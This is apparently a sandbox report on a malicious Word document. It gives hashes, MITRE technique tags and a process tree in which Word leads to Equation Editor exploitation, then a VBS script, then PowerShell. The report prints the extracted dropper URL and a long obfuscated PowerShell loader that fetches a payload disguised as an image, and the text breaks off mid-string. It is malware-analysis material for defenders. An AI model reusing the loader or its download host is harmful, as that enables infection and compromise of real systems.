0efbc73c4e417d1153c08bdf7e101ee744a3f34c8241b073c2e0dfe34cd6139a

Analysis

max time kernel
142s
max time network
151s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
09/08/2024, 10:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

678a5620c1a6144e6572baf64065c3ef.docx
Size

89KB
MD5

678a5620c1a6144e6572baf64065c3ef
SHA1

8485b42751328b5aa0bbc88b01600e8f17cebbcd
SHA256

0efbc73c4e417d1153c08bdf7e101ee744a3f34c8241b073c2e0dfe34cd6139a
SHA512

53fb3a8029e9ad7f8e4f4b2861b856563fbef62c7339a73c868a8c986cb27ab75ee528b1c4fa4c9007c031676a07946ee0263d56aa106de86790e7b1d2139a2f
SSDEEP

1536:CH3mtb7ih7kPw17kG1Nc2FjOppKdA6KJvarn82+C4kAh6rhFRmxN/Sh+e:CHWt3ixkw17kcrOppKdsvarh4h69vmHu

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://servidorwindows.ddns.com.br/Files/vbs.jpeg

exe.dropper

http://servidorwindows.ddns.com.br/Files/vbs.jpeg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	2620	EQNEDT32.EXE
15	1280	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
668	powershell.exe
1280	powershell.exe

Abuses OpenXML format to download file from external location

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2620	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2652	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
668	powershell.exe
1280	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	668	powershell.exe
Token: SeDebugPrivilege	1280	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2652	WINWORD.EXE
2652	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2620 wrote to memory of 276	2620	EQNEDT32.EXE	32
PID 2620 wrote to memory of 276	2620	EQNEDT32.EXE	32
PID 2620 wrote to memory of 276	2620	EQNEDT32.EXE	32
PID 2620 wrote to memory of 276	2620	EQNEDT32.EXE	32
PID 276 wrote to memory of 668	276	WScript.exe	34
PID 276 wrote to memory of 668	276	WScript.exe	34
PID 276 wrote to memory of 668	276	WScript.exe	34
PID 276 wrote to memory of 668	276	WScript.exe	34
PID 2652 wrote to memory of 2424	2652	WINWORD.EXE	36
PID 2652 wrote to memory of 2424	2652	WINWORD.EXE	36
PID 2652 wrote to memory of 2424	2652	WINWORD.EXE	36
PID 2652 wrote to memory of 2424	2652	WINWORD.EXE	36
PID 668 wrote to memory of 1280	668	powershell.exe	37
PID 668 wrote to memory of 1280	668	powershell.exe	37
PID 668 wrote to memory of 1280	668	powershell.exe	37
PID 668 wrote to memory of 1280	668	powershell.exe	37

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\678a5620c1a6144e6572baf64065c3ef.docx"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2652
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2424

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2620
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\buttercreamnewthingsbetterw.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J᭸ ㇡ ⠿ ᧸ ₲Bs᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲bgBr᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲PQ᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Cc᭸ ㇡ ⠿ ᧸ ₲a᭸ ㇡ ⠿ ᧸ ₲B0᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲c᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲6᭸ ㇡ ⠿ ᧸ ₲C8᭸ ㇡ ⠿ ᧸ ₲LwBz᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲cgB2᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bv᭸ ㇡ ⠿ ᧸ ₲HI᭸ ㇡ ⠿ ᧸ ₲dwBp᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bv᭸ ㇡ ⠿ ᧸ ₲Hc᭸ ㇡ ⠿ ᧸ ₲cw᭸ ㇡ ⠿ ᧸ ₲u᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bu᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲LgBj᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲bQ᭸ ㇡ ⠿ ᧸ ₲u᭸ ㇡ ⠿ ᧸ ₲GI᭸ ㇡ ⠿ ᧸ ₲cg᭸ ㇡ ⠿ ᧸ ₲v᭸ ㇡ ⠿ ᧸ ₲EY᭸ ㇡ ⠿ ᧸ ₲aQBs᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲cw᭸ ㇡ ⠿ ᧸ ₲v᭸ ㇡ ⠿ ᧸ ₲HY᭸ ㇡ ⠿ ᧸ ₲YgBz᭸ ㇡ ⠿ ᧸ ₲C4᭸ ㇡ ⠿ ᧸ ₲agBw᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲Zw᭸ ㇡ ⠿ ᧸ ₲n᭸ ㇡ ⠿ ᧸ ₲Ds᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲Hc᭸ ㇡ ⠿ ᧸ ₲ZQBi᭸ ㇡ ⠿ ᧸ ₲EM᭸ ㇡ ⠿ ᧸ ₲b᭸ ㇡ ⠿ ᧸ ₲Bp᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲bgB0᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲PQ᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲E4᭸ ㇡ ⠿ ᧸ ₲ZQB3᭸ ㇡ ⠿ ᧸ ₲C0᭸ ㇡ ⠿ ᧸ ₲TwBi᭸ ㇡ ⠿ ᧸ ₲Go᭸ ㇡ ⠿ ᧸ ₲ZQBj᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲BT᭸ ㇡ ⠿ ᧸ ₲Hk᭸ ㇡ ⠿ ᧸ ₲cwB0᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲bQ᭸ ㇡ ⠿ ᧸ ₲u᭸ ㇡ ⠿ ᧸ ₲E4᭸ ㇡ ⠿ ᧸ ₲ZQB0᭸ ㇡ ⠿ ᧸ ₲C4᭸ ㇡ ⠿ ᧸ ₲VwBl᭸ ㇡ ⠿ ᧸ ₲GI᭸ ㇡ ⠿ ᧸ ₲QwBs᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲ZQBu᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲Ow᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲cgB5᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲ew᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bv᭸ ㇡ ⠿ ᧸ ₲Hc᭸ ㇡ ⠿ ᧸ ₲bgBs᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲YQBk᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲BE᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bh᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲PQ᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲dwBl᭸ ㇡ ⠿ ᧸ ₲GI᭸ ㇡ ⠿ ᧸ ₲QwBs᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲ZQBu᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲LgBE᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲dwBu᭸ ㇡ ⠿ ᧸ ₲Gw᭸ ㇡ ⠿ ᧸ ₲bwBh᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲R᭸ ㇡ ⠿ ᧸ ₲Bh᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲YQ᭸ ㇡ ⠿ ᧸ ₲o᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲b᭸ ㇡ ⠿ ᧸ ₲Bp᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲aw᭸ ㇡ ⠿ ᧸ ₲p᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲fQ᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲GM᭸ ㇡ ⠿ ᧸ ₲YQB0᭸ ㇡ ⠿ ᧸ ₲GM᭸ ㇡ ⠿ ᧸ ₲a᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Hs᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲BX᭸ ㇡ ⠿ ᧸ ₲HI᭸ ㇡ ⠿ ᧸ ₲aQB0᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲LQBI᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲cwB0᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲JwBG᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲aQBs᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲FQ᭸ ㇡ ⠿ ᧸ ₲bw᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲bwB3᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲b᭸ ㇡ ⠿ ᧸ ₲Bv᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲YQB0᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲Bm᭸ ㇡ ⠿ ᧸ ₲HI᭸ ㇡ ⠿ ᧸ ₲bwBt᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bs᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲bgBr᭸ ㇡ ⠿ ᧸ ₲Cc᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲t᭸ ㇡ ⠿ ᧸ ₲EY᭸ ㇡ ⠿ ᧸ ₲bwBy᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲ZwBy᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲dQBu᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲QwBv᭸ ㇡ ⠿ ᧸ ₲Gw᭸ ㇡ ⠿ ᧸ ₲bwBy᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲UgBl᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲Ow᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲e᭸ ㇡ ⠿ ᧸ ₲Bp᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲B9᭸ ㇡ ⠿ ᧸ ₲Ds᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲Bp᭸ ㇡ ⠿ ᧸ ₲GY᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲o᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bv᭸ ㇡ ⠿ ᧸ ₲Hc᭸ ㇡ ⠿ ᧸ ₲bgBs᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲YQBk᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲BE᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bh᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲LQBu᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲dQBs᭸ ㇡ ⠿ ᧸ ₲Gw᭸ ㇡ ⠿ ᧸ ₲KQ᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Hs᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲bQBh᭸ ㇡ ⠿ ᧸ ₲Gc᭸ ㇡ ⠿ ᧸ ₲ZQBU᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲e᭸ ㇡ ⠿ ᧸ ₲B0᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲PQ᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Fs᭸ ㇡ ⠿ ᧸ ₲UwB5᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲G0᭸ ㇡ ⠿ ᧸ ₲LgBU᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲e᭸ ㇡ ⠿ ᧸ ₲B0᭸ ㇡ ⠿ ᧸ ₲C4᭸ ㇡ ⠿ ᧸ ₲RQBu᭸ ㇡ ⠿ ᧸ ₲GM᭸ ㇡ ⠿ ᧸ ₲bwBk᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲bgBn᭸ ㇡ ⠿ ᧸ ₲F0᭸ ㇡ ⠿ ᧸ ₲Og᭸ ㇡ ⠿ ᧸ ₲6᭸ ㇡ ⠿ ᧸ ₲FU᭸ ㇡ ⠿ ᧸ ₲V᭸ ㇡ ⠿ ᧸ ₲BG᭸ ㇡ ⠿ ᧸ ₲Dg᭸ ㇡ ⠿ ᧸ ₲LgBH᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲BT᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲cgBp᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Zw᭸ ㇡ ⠿ ᧸ ₲o᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bv᭸ ㇡ ⠿ ᧸ ₲Hc᭸ ㇡ ⠿ ᧸ ₲bgBs᭸ ㇡ ⠿ ᧸ ₲G8᭸ ㇡ ⠿ ᧸ ₲YQBk᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲BE᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bh᭸ ㇡ ⠿ ᧸ ₲Ck᭸ ㇡ ⠿ ᧸ ₲Ow᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲cwB0᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲cgB0᭸ ㇡ ⠿ ᧸ ₲EY᭸ ㇡ ⠿ ᧸ ₲b᭸ ㇡ ⠿ ᧸ ₲Bh᭸ ㇡ ⠿ ᧸ ₲Gc᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲9᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲Jw᭸ ㇡ ⠿ ᧸ ₲8᭸ ㇡ ⠿ ᧸ ₲Dw᭸ ㇡ ⠿ ᧸ ₲QgBB᭸ ㇡ ⠿ ᧸ ₲FM᭸ ㇡ ⠿ ᧸ ₲RQ᭸ ㇡ ⠿ ᧸ ₲2᭸ ㇡ ⠿ ᧸ ₲DQ᭸ ㇡ ⠿ ᧸ ₲XwBT᭸ ㇡ ⠿ ᧸ ₲FQ᭸ ㇡ ⠿ ᧸ ₲QQBS᭸ ㇡ ⠿ ᧸ ₲FQ᭸ ㇡ ⠿ ᧸ ₲Pg᭸ ㇡ ⠿ ᧸ ₲+᭸ ㇡ ⠿ ᧸ ₲Cc᭸ ㇡ ⠿ ᧸ ₲Ow᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲ZQBu᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲RgBs᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲Zw᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲D0᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲n᭸ ㇡ ⠿ ᧸ ₲Dw᭸ ㇡ ⠿ ᧸ ₲P᭸ ㇡ ⠿ ᧸ ₲BC᭸ ㇡ ⠿ ᧸ ₲EE᭸ ㇡ ⠿ ᧸ ₲UwBF᭸ ㇡ ⠿ ᧸ ₲DY᭸ ㇡ ⠿ ᧸ ₲N᭸ ㇡ ⠿ ᧸ ₲Bf᭸ ㇡ ⠿ ᧸ ₲EU᭸ ㇡ ⠿ ᧸ ₲TgBE᭸ ㇡ ⠿ ᧸ ₲D4᭸ ㇡ ⠿ ᧸ ₲Pg᭸ ㇡ ⠿ ᧸ ₲n᭸ ㇡ ⠿ ᧸ ₲Ds᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bh᭸ ㇡ ⠿ ᧸ ₲HI᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲BJ᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲Hg᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲9᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bp᭸ ㇡ ⠿ ᧸ ₲G0᭸ ㇡ ⠿ ᧸ ₲YQBn᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲V᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲Hg᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲u᭸ ㇡ ⠿ ᧸ ₲Ek᭸ ㇡ ⠿ ᧸ ₲bgBk᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲e᭸ ㇡ ⠿ ᧸ ₲BP᭸ ㇡ ⠿ ᧸ ₲GY᭸ ㇡ ⠿ ᧸ ₲K᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bh᭸ ㇡ ⠿ ᧸ ₲HI᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲BG᭸ ㇡ ⠿ ᧸ ₲Gw᭸ ㇡ ⠿ ᧸ ₲YQBn᭸ ㇡ ⠿ ᧸ ₲Ck᭸ ㇡ ⠿ ᧸ ₲Ow᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲ZQBu᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲SQBu᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲ZQB4᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲PQ᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲aQBt᭸ ㇡ ⠿ ᧸ ₲GE᭸ ㇡ ⠿ ᧸ ₲ZwBl᭸ ㇡ ⠿ ᧸ ₲FQ᭸ ㇡ ⠿ ᧸ ₲ZQB4᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲LgBJ᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲Hg᭸ ㇡ ⠿ ᧸ ₲TwBm᭸ ㇡ ⠿ ᧸ ₲Cg᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bl᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲BG᭸ ㇡ ⠿ ᧸ ₲Gw᭸ ㇡ ⠿ ᧸ ₲YQBn᭸ ㇡ ⠿ ᧸ ₲Ck᭸ ㇡ ⠿ ᧸ ₲Ow᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Gk᭸ ㇡ ⠿ ᧸ ₲Zg᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲Cg᭸ ㇡ ⠿ ᧸ ₲J᭸ ㇡ ⠿ ᧸ ₲Bz᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲YQBy᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲SQBu᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲ZQB4᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲LQBn᭸ ㇡ ⠿ ᧸ ₲GU᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲w᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲LQBh᭸ ㇡ ⠿ ᧸ ₲G4᭸ ㇡ ⠿ ᧸ ₲Z᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲g᭸ ㇡ ⠿ ᧸ ₲CQ᭸ ㇡ ⠿ ᧸ ₲ZQBu᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲SQBu᭸ ㇡ ⠿ ᧸ ₲GQ᭸ ㇡ ⠿ ᧸ ₲ZQB4᭸ ㇡ ⠿ ᧸ ₲C᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲LQBn᭸ ㇡ ⠿ ᧸ ₲HQ᭸ ㇡ ⠿ ᧸ ₲I᭸ ㇡ ⠿ ᧸ ₲᭸ ㇡ ⠿ ᧸ ₲k᭸ ㇡ ⠿ ᧸ ₲HM᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ ᧸ ₲Bh᭸ ㇡ ⠿ ᧸ ₲HI᭸ ㇡ ⠿ ᧸ ₲d᭸ ㇡ ⠿ 